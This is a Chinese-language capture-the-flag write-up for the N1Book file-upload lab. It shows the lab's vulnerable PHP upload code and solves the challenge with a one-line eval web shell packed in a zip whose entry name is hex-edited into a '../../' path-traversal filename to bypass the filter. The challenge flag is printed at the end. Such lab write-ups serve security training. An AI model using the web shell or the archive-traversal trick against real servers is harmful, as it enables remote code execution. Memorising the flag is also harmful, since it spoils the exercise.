1.1漏洞描述
| 漏洞名称 | 01ctfer 文件上传 |
| 漏洞类型 | 文件上传 |
| 漏洞等级 | ⭐⭐⭐ |
| 漏洞环境 | docker |
| 攻击方式 |
1.2漏洞等级
高危
1.3影响版本
暂无
1.4漏洞复现
1.4.1.基础环境
| 靶场 | docker |
| 工具 | BurpSuite |
1.4.2.环境搭建
1.创建docker-compose.yml文件
version: '3.2'
services:
upload:
image: registry.cn-hangzhou.aliyuncs.com/n1book/web-upload:latest
ports:
- 80:80
2.将上述代码写入文件,开启
sudo docker-compose up -d
3.访问80端口
4.环境搭建成功。
1.5深度利用
1.5.1靶场攻略
1.代码分析
<?php
header("Content-Type:text/html; charset=utf-8");
// 每5分钟会清除一次目录下上传的文件
require_once('pclzip.lib.php');
if(!$_FILES){
echo '
<!DOCTYPE html>
<html lang="zh">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<meta http-equiv="X-UA-Compatible" content="ie=edge" />
<title>文件上传章节练习题</title>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@3.3.7/dist/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<style type="text/css">
.login-box{
margin-top: 100px;
height: 500px;
border: 1px solid #000;
}
body{
background: white;
}
.btn1{
width: 200px;
}
.d1{
display: block;
height: 400px;
}
</style>
</head>
<body>
<div class="container">
<div class="login-box col-md-12">
<form class="form-horizontal" method="post" enctype="multipart/form-data" >
<h1>文件上传章节练习题</h1>
<hr />
<div class="form-group">
<label class="col-sm-2 control-label">选择文件:</label>
<div class="input-group col-sm-10">
<div >
<label for="">
<input type="file" name="file" />
</label>
</div>
</div>
</div>
<div class="col-sm-8 text-right">
<input type="submit" class="btn btn-success text-right btn1" />
</div>
</form>
</div>
</div>
</body>
</html>
';
show_source(__FILE__);
}else{
$file = $_FILES['file'];
if(!$file){
exit("请勿上传空文件");
}
$name = $file['name'];
$dir = 'upload/';
$ext = strtolower(substr(strrchr($name, '.'), 1));
$path = $dir.$name;
function check_dir($dir){
$handle = opendir($dir);
while(($f = readdir($handle)) !== false){
if(!in_array($f, array('.', '..'))){
if(is_dir($dir.$f)){
check_dir($dir.$f.'/');
}else{
$ext = strtolower(substr(strrchr($f, '.'), 1));
if(!in_array($ext, array('jpg', 'gif', 'png'))){
unlink($dir.$f);
}
}
}
}
}
if(!is_dir($dir)){
mkdir($dir);
}
$temp_dir = $dir.md5(time(). rand(1000,9999));
if(!is_dir($temp_dir)){
mkdir($temp_dir);
}
if(in_array($ext, array('zip', 'jpg', 'gif', 'png'))){
if($ext == 'zip'){
$archive = new PclZip($file['tmp_name']);
foreach($archive->listContent() as $value){
$filename = $value["filename"];
if(preg_match('/\.php$/', $filename)){
exit("压缩包内不允许含有php文件!");
}
}
if ($archive->extract(PCLZIP_OPT_PATH, $temp_dir, PCLZIP_OPT_REPLACE_NEWER) == 0) {
check_dir($dir);
exit("解压失败");
}
check_dir($dir);
exit('上传成功!');
}else{
move_uploaded_file($file['tmp_name'], $temp_dir.'/'.$file['name']);
check_dir($dir);
exit('上传成功!');
}
}else{
exit('仅允许上传zip、jpg、gif、png文件!');
}
}阅读源码可得:
1.后端执行的是白名单过滤,仅允许上传zip、jpg、gif、png后缀的文件。
2.上传后的文件放在upload路径下,rand函数加hash随机命名
3.对于zip文件,如果解压后,文件夹中含有php文件,就将其移除。
2.开始解题
1.在文件夹中创立一个一句话木马,文件名为111111111111111111
<?php @eval($_POST[777]);?>
2.压缩命名为 111111111111111111.zip 没有错(18个一,后面说原因)
3.打开010Edieor(没下的点击看教程下载)在这里打开zip文件。
4..将111111111111111111改为../../hack.php.abc (18个1是我这个文件名要修改的长度,可以根据自己要创立的文件名长度自行修改( 比如../../shell.php.abc 就写19个1))(../../是为了上传到根目录)
5.上传
6..进入上传路径,获得flag
7.拿到flag
n1book{ThisIsUpLoadToPicfl4g}
1.6漏洞挖掘
1.6.1指纹信息
1.7修复建议
-
升级
-
打补丁
-
上设备
